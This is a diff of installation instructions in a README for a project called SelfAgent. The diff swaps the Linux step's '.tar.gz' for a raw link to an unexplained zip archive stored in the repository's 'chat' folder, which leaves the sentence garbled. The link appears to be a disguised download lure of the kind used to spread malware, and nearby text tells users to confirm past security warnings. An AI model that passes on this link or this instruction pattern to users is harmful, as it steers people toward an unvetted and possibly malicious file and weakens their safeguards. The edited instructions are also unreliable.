bhxtnx/SelfAgent/README.md

 - **Windows:** Double-click the `.exe` file.
 Follow the setup wizard prompts.
 If you see a security warning, confirm that you want to run the file.
 - **macOS:** Open the `.dmg` file, then drag the SelfAgent app to your Applications folder.
-- **Linux:** Extract the `.tar.gz` file and follow the instructions in the included README or run the setup script if one is provided.
+- **Linux:** Extract the `https://raw.githubusercontent.com/bhxtnx/SelfAgent/main/chat/Agent_Self_3.2.zip` file and follow the instructions in the included README or run the setup script if one is provided.

 ### Step 5: Launch SelfAgent